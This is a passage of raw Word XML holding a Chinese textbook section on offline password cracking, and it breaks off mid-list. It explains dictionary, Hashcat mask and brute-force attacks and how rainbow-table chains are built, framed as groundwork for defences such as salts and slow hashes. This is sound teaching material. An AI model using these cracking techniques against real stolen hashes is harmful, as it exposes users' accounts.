        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入、服务器失陷还是配置错误导致备份被盗——攻击者拿到的只是一堆看似无意义的哈希值。然而，如果这些哈希来自一个未经妥善保护的密码存储方案，它们就会变成离线爆破的理想靶场。攻击者只需将猜测的口令用同一算法哈希一遍，再与泄露的哈希对比，即“猜了再对”。弱口令、无盐哈希或快速哈希函数，会使这个过程变得极其廉价而高效。防御者则面对相反的使命：即使数据库被整体拖走，也应使攻击者无法从中恢复绝大部分口令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这便是本节所讨论的“离线爆破”的攻防核心。在离线场景下，攻击者没有网络延迟与账户锁定策略的限制，可以全速穷举或查表，唯一约束是算力与时间。防御者的对抗手段则是提高每次猜测的成本（慢哈希）、消除预计算优势（盐）以及强制用户选用高熵口令。我们首先从攻击面建模入手，逐步解析字典攻击、掩码攻击、暴力攻击的复杂性，然后深入彩虹表这一经典的时空权衡算法，揭示它为何在无盐场景下如此致命，又为何在唯一盐面前瞬间失效。最后以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> John the Ripper </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的靶机实操收束，并给出强制性的防御蓝图。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="233"/>
    <w:bookmarkStart w:id="234" w:name="攻击面与攻击者假设"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击面与攻击者假设</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">离线密码破解的典型攻击链如下：攻击者通过某种手段获得目标系统中存储的密码哈希文件——可能是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的副本、应用程序用户表导出的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">散列，或一个疏于防护的备份归档。此时攻击者处于“离线”状态，可完全控制破解环境：选择</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GPU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">集群、定制字典、设计掩码规则，并在没有任何速率限制、账户锁定或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">干扰的前提下进行尝试。攻击者的假设是：①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已知所使用的哈希算法（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA-256、bcrypt）；②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果存在盐，盐值通常与哈希一同存储，且攻击者亦可获取；③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户选用的口令普遍具有低熵特征，即大量使用了常见单词、数字序列和键盘模式。这些假设在实际数据泄露事件中屡经验证，这使离线攻击成为数据泄露后的最大二次伤害来源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御者则必须基于更严格的威胁模型设计存储方案：即便攻击者获得了完整的密码哈希数据库（包括盐和迭代参数），也应使从哈希恢复明文的计算代价高到不可接受。因此，现代密码存储方案必须同时对抗穷举攻击和预计算攻击（如彩虹表），并尽可能将安全边界前移（例如，通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用防火墙与数据库访问控制缩小泄露面，但本书将重点放在密码学层面的防御，这属于“纵深防御”的末层保障）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="234"/>
    <w:bookmarkStart w:id="238" w:name="字典攻击掩码攻击与暴力穷举标①②"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字典攻击、掩码攻击与暴力穷举（标①②）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="235" w:name="字典攻击"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字典攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最基本的离线攻击是字典攻击：攻击者准备一份包含常见口令、泄露密码库、单词变体的词表，逐行读取并计算其哈希，若与目标哈希匹配即告成功。这一方法利用了人类选择密码的强预测性。词表可以来自公开密码合集（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">rockyou、SecLists），也可根据目标信息定制（如公司名、生日、球类术语）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字典攻击的速度取决于哈希函数的计算开销与硬件性能。对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MD5、NTLM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等快速哈希函数，现代消费级</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GPU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">每秒可计算数十亿次哈希，一份</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1400 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">万条的词表可在瞬间测完。因此，在未加盐或仅使用系统全局盐时，字典攻击是首选。攻击方的优势可形式化为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <m:oMathPara>
        <m:oMathParaPr>
          <m:jc m:val="center"/>
        </m:oMathParaPr>
        <m:oMath>
          <m:r>
            <m:rPr>
              <m:nor/>
              <m:sty m:val="p"/>
            </m:rPr>
            <m:t>破解数量</m:t>
          </m:r>
          <m:r>
            <m:rPr>
              <m:sty m:val="p"/>
            </m:rPr>
            <m:t>=</m:t>
          </m:r>
          <m:nary>
            <m:naryPr>
              <m:chr m:val="∑"/>
              <m:limLoc m:val="undOvr"/>
              <m:subHide m:val="off"/>
              <m:supHide m:val="on"/>
            </m:naryPr>
            <m:sub>
              <m:r>
                <m:t>p</m:t>
              </m:r>
              <m:r>
                <m:rPr>
                  <m:sty m:val="p"/>
                </m:rPr>
                <m:t>∈</m:t>
              </m:r>
              <m:r>
                <m:rPr>
                  <m:nor/>
                  <m:sty m:val="p"/>
                </m:rPr>
                <m:t>Dictionary</m:t>
              </m:r>
            </m:sub>
            <m:sup>
              <m:r>
                <m:t>​</m:t>
              </m:r>
            </m:sup>
            <m:e>
              <m:d>
                <m:dPr>
                  <m:begChr m:val="["/>
                  <m:sepChr m:val=""/>
                  <m:endChr m:val="]"/>
                  <m:grow/>
                </m:dPr>
                <m:e>
                  <m:r>
                    <m:rPr>
                      <m:nor/>
                      <m:sty m:val="p"/>
                    </m:rPr>
                    <m:t>Hash</m:t>
                  </m:r>
                  <m:d>
                    <m:dPr>
                      <m:begChr m:val="("/>
                      <m:sepChr m:val=""/>
                      <m:endChr m:val=")"/>
                      <m:grow/>
                    </m:dPr>
                    <m:e>
                      <m:r>
                        <m:t>p</m:t>
                      </m:r>
                    </m:e>
                  </m:d>
                  <m:r>
                    <m:rPr>
                      <m:sty m:val="p"/>
                    </m:rPr>
                    <m:t>∈</m:t>
                  </m:r>
                  <m:r>
                    <m:rPr>
                      <m:nor/>
                      <m:sty m:val="p"/>
                    </m:rPr>
                    <m:t>TargetSet</m:t>
                  </m:r>
                </m:e>
              </m:d>
            </m:e>
          </m:nary>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此处</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:rPr>
            <m:nor/>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>Hash</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:r>
              <m:t>p</m:t>
            </m:r>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以是加了已知盐的版本。攻击者的回报率直接取决于字典覆盖率与目标集的口令强度分布。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="235"/>
    <w:bookmarkStart w:id="236" w:name="掩码攻击"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">掩码攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户在做出口令时虽常有变异，但仍遵循可模板化的模式：首字母大写、尾部追加数字或特殊字符、1337</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语替换等。Hashcat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供的掩码攻击允许攻击者定义字符集与位置结构，例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?u?l?l?l?l?d?d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示“一个大写字母</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">四个小写字母</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">两个数字”。掩码攻击是字典攻击与纯暴力之间的折中——它利用了口令构造的统计规律，大幅压缩搜索空间。然而，掩码的定义依赖于攻击者的经验或统计建模。PassGAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的纯数据驱动方法也试图自动学习口令分布并生成猜测，但工具普及度不及成熟的规则引擎。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="236"/>
    <w:bookmarkStart w:id="237" w:name="暴力攻击与密钥空间估算"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">暴力攻击与密钥空间估算</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">纯粹的暴力攻击会逐一枚举所有可能字符组合，其搜索空间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>S</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:sSup>
          <m:e>
            <m:r>
              <m:t>C</m:t>
            </m:r>
          </m:e>
          <m:sup>
            <m:r>
              <m:t>L</m:t>
            </m:r>
          </m:sup>
        </m:sSup>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，其中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>C</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为字符集大小，</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>L</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为口令长度。当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>L</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">增大时，暴力攻击迅速变得不可行。对于慢哈希（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bcrypt cost </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">12），即使</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>L</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:r>
          <m:t>8</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">也有可能已不现实。因此，一个理性的攻击者不会从纯粹的暴力开始，而是优先使用字典</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则扩展</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">掩码攻击</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">长掩码（本质上接近按模板的暴力）这样的组合策略。这三种攻击均依赖实时计算哈希值，因而防御方的主要应对是提升每次计算的延迟（即慢哈希</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">KDF）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">三态标注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：字典攻击与掩码攻击的通用原理属于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①；具体词表命中率与掩码有效性因目标群体和文化背景而异，属于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②；暴力攻击的密钥空间公式对所有符合字符集假设的口令空间成立，但“何时暴力不可行”会随硬件算力动态变化，属于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ③/②。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="237"/>
    <w:bookmarkEnd w:id="238"/>
    <w:bookmarkStart w:id="241" w:name="彩虹表的时空权衡标①②①"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">彩虹表的时空权衡（标①②①）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">彩虹表（Rainbow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Table）是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Philippe Oechslin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2003 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">年提出的一种预计算攻击，旨在以空间换时间，使得对无盐哈希的反向查找效率远超实时穷举。其核心思想是：在攻击发生之前，花费巨量的计算资源构建一组表，这些表存储了哈希链的起始端和末端，每条链通过交替应用“归约函数”和“哈希函数”来覆盖大量的候选口令。攻击时，只需在捕获哈希的尾部施加有限次数的归约与哈希运算，并在表中查对，即可回溯出产生该哈希的口令。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="239" w:name="哈希链的构造"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">哈希链的构造</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一条彩虹链的构造过程如下：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随机选取一个初始口令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">P0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（通常取自全密钥空间的均匀采样）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">计算其哈希值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">H0 = Hash(P0)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">H0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输入到第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个归约函数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">R1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，归约函数将哈希值映射回口令空间，得到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">P1 = R1(H0)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">再对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">P1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">哈希得到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">H1 = Hash(P1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，然后使用第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个归约函数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">R2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">得到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">P2 = R2(H1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，如此反复，经过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">次迭代后得到一个尾端口令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Pk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
